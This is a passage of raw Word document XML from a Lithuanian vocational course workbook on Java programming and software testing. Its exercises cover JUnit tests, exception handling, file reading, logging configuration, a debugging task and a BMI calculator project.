          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PAGAL PATEIKTAS KLASES NUBRAIŽYKITE UML JAVA KLASIŲ DIAGRAMĄ</w:t>
      </w:r>
      <w:r w:rsidR="00201154">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4768A3CD" wp14:editId="1460CC76">
            <wp:extent cx="4174490" cy="1881505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="219" name="Picture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_25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74490" cy="1881505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D453E2" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="318" w:name="_Toc163745443"/>
      <w:bookmarkStart w:id="319" w:name="_Toc10444012"/>
      <w:bookmarkStart w:id="320" w:name="_Toc13095560"/>
      <w:bookmarkStart w:id="321" w:name="_Hlk13830919"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.4.</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="322" w:name="_Toc13833454"/>
      <w:bookmarkStart w:id="323" w:name="_Toc14392515"/>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. Testuoti programinę įrangą naudojant su </w:t>
      </w:r>
      <w:r w:rsidR="00201154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">pasirinkta </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>programavimo kalba suderinamus testavimo įrankius ir metodus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="319"/>
      <w:bookmarkEnd w:id="320"/>
      <w:bookmarkEnd w:id="322"/>
      <w:bookmarkEnd w:id="323"/>
    </w:p>
    <w:bookmarkEnd w:id="321"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD"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SUKURKITE NAUJĄ JAVA PROJEKTĄ VARDU JAVATESTING</w:t>
      </w:r>
      <w:r w:rsidR="00332165">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juni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JavaForTesting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ring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JavaForTesting(String nam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ame =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t>public String getNam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2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. PARAŠYKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1  užduotyje </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURTAM PROJEKTUI VIENĄ PAPRASTĄ  TESTĄ, KURIS PATIKRINA AR KLASĖ JAVAFORTESTING VEIKIA TEISINGAI</w:t>
      </w:r>
      <w:r w:rsidR="00332165">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juni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JavaForTesting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nameReturnCorrect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JavaForTesting javaForTesting = new JavaForTesting("Da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av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javaForTesting.get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3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE NAUJĄ JAVA PROJEKTĄ VARDU </w:t>
      </w:r>
      <w:r w:rsidR="005B2117" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTING</w:t>
      </w:r>
      <w:r w:rsidR="00341386">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test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Calculato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int number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int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Calculator(int numberOne, int numberTwo)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umberOne = numberO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umberTwo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ad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substra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multip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double div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numberTwo ==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return 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double) (numberOne / numberTwo);</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testin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testing.Calculato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Calculator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addTwoNumbersCorrect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lculator calculator = new Calculator(2, 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4,</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alculator.ad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substractTwoNumbersCorrect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lculator calculator = new Calculator(-2, -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alculator.substrac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multiplyTwoNumbersCorrect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lculator calculator = new Calculator(-2, -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4,</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alculator.multip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divideTwoNumbersCorrectl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Calculator calculator = new Calculator(2, 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alculator.div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outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00003B13" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 KOMPETENCIJOS 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">.3. MOKYMOSI REZULTATO </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  REALIZUOTAI PARDUOTUVEI SU PREKIŲ KREPŠELIU PARAŠYKITE JUNIT TESTUS, KURIE PATIKRINTŲ PRODUKTŲ GRUPIŲ IR PREKIŲ KREPŠELIO FUNKCIONALUMĄ</w:t>
      </w:r>
      <w:r w:rsidR="003915F2">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>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ShoppingCart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calculatesTotalCart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 shoppingCart = new ShoppingC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add(new TestCartItem(2.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add(new TestCartItem(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4.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hoppingCart.getTotal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calculatesTotalCartPriceWith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 shoppingCart = new ShoppingC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add(new TestCartItem(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hoppingCart.add(new TestCartItem(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6.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hoppingCart.getTotal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class TestCartItem implements ShoppingCartItem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rivate double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ublic TestCartItem(double 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this.price = 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verr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ublic double get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return this.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Overrid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ublic double getPriceWith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return this.price * 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class Product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productHasNameAndPric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roduct product = new Product("Product Name", 1.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duct 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duct.get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1.5,</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duct.getPric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calculates21PercentVa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Product product = new Product("",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2.42,</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roduct.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Medicine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medicineReturnsPriceWith5PercentVatApplie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Medicine medicine = new Medicine("Aspirin",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2.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medicine.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0.0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object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junit.jupiter.api.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static org.junit.jupiter.api.Assertions.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class PeriodicalTes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Tes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void returnsPriceWith9PercentVatApplied()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Periodical periodical = new Periodical("Java", 2.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assertEqual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2.18,</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periodical.getPriceWithVa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0.0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5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU SIMPLEEXCEPTION.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="003915F2">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excep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Array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SimpleException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intArray = new int[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or (int i = 0; i &lt; 20; i++)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intArray[i] = (int) (Math.random() * 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ArrayIndexOutOfBoundsException e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Array is too small! \n" + ex);</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finall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Arrays.toString(intArra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6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU FILEREADERS.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00785C3A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">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exception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Buffered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NotFound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File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io.IOExce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FileReader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String FILENAME = "textfile.tx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String line = nul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ry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ileReader fileReader = new FileReader(FILE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ufferedReader bufferedReader = new BufferedReader(fileRea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hile((line = bufferedReader.readLine()) != null)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ufferedReader.clo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FileNotFoundException e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r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println("Unable to open file '" + FILENAME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catch (IOException e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Error reading file '" + FILENAME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7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVALOGGER.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="009B4215">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logger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ogging.Level;</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java.util.logging.Logg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Logg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static final Logger LOGGER = Logger.getLogger(JavaLogger.class.getNam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log(Level.INFO, "Program st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Fibonacci number &lt; 10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log(Level.INFO, "Fibonacci number count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a = 1, b = 1;</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a + ", " + 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t c = a + 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 " + c);</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a = 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 = c;</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 = a + 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 while (c &lt; 100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log(Level.INFO, "End program.");</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A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE JAVA KLASĘ VARDU JAVAFILELOGGER.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00F60C90">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ackage javalogger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slf4j.Logg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import org.slf4j.LoggerFactory;</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FileLogger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rivate final static Logger LOGGER = LoggerFactory.getLogger(JavaFileLogger.class);</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info("Program star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Multiplication ta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info("StringBuilder initialisa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tringBuilder line = new StringBuil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i = 0; i &lt; 51;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line.appen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r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.print("|  X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or (int i = 1; i &lt; 10;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f("%3d |",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for (int j = 1; j &lt; 10; ++j)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f("|%3d |", j);</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for (int i = 1; i &lt; 10; ++i)</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f("%3d |", i * j);</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lin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LOGGER.info("Program end.");</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pP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Root logger optio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rootLogger=INFO, fi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 configuration to print into fi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org.apache.log4j.RollingFileAppend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File=javafilelogger.log</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MaxFileSize=12MB</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MaxBackupIndex=10</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layout=org.apache.log4j.PatternLayou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log4j.appender.file.layout.ConversionPattern=%d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. IŠBANDYKITE PATEIKTĄ JAVA PROGRAMINĮ KODĄ</w:t>
      </w:r>
      <w:r w:rsidR="00A60196">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>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JavaDebug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public static void main(String[] args)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ln("Square perimeter and area count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canner input = new Scanner(System.in);</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ystem.out.print("Input square side, a =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double a = input.nextDoubl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nput.close();</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a &gt; 0)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ouble area = Math.sqrt(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ouble perimeter = 4 * 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Square area A = " + area);</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Square perimeter P = " + perimet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if (a &lt;= 0) {</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Error! The length of the side is to be a positive number.");</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A858DD"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai galite paskaityti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="120" w:right="282" w:hangingChars="50" w:hanging="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId141" w:history="1">
        <w:r w:rsidRPr="00382285">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/8/docs/technotes/tools/windows/jdb.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00382285">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="120" w:right="282" w:hangingChars="50" w:hanging="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. JetBrains (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Debugging Your First Java Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId142" w:history="1">
        <w:r w:rsidRPr="00382285">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/debugging-your-first-java-application.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00382285">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="120" w:right="282" w:hangingChars="50" w:hanging="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. TutorialPoints (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse - Debugging Program</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId143" w:history="1">
        <w:r w:rsidRPr="00382285">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/eclipse/eclipse_debugging_program.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00382285">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NORINT PATIKRINTI ŽMOGAUS KŪNO MASĖS INDEKSĄ, REIKALINGAS SKAIČIUOTUVAS. SUKURKITE PROJEKTĄ BMI, SKIRTĄ ŠIAI UŽDUOČIAI</w:t>
      </w:r>
      <w:r w:rsidR="00D06719">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Panaudokite komandinio darbų planavimo sistemas: Jira (Atlassian), Microsoft Project (Microsoft), Trello (Atlassian), HeySpace (Time Solutions TimeCa</w:t>
      </w:r>
      <w:r w:rsidR="00D06719">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mp Inc.), Taiga (Taiga) ir pan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D06719" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="324" w:name="_Toc14392516"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Modulis „I</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06719">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nformacinių sistemų testavimas</w:t>
      </w:r>
      <w:r w:rsidR="00CF751A" w:rsidRPr="00D06719">
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="324"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D06719" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="325" w:name="_Toc14392517"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00495EC1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF751A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Kurti ir vykdyti nesudėtingus testavimo atvejus rankiniu būdu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A613EC" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="00E2378F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003433A9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Suprasti programinės įrangos kūrimo ciklą ir testavimo tikslus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
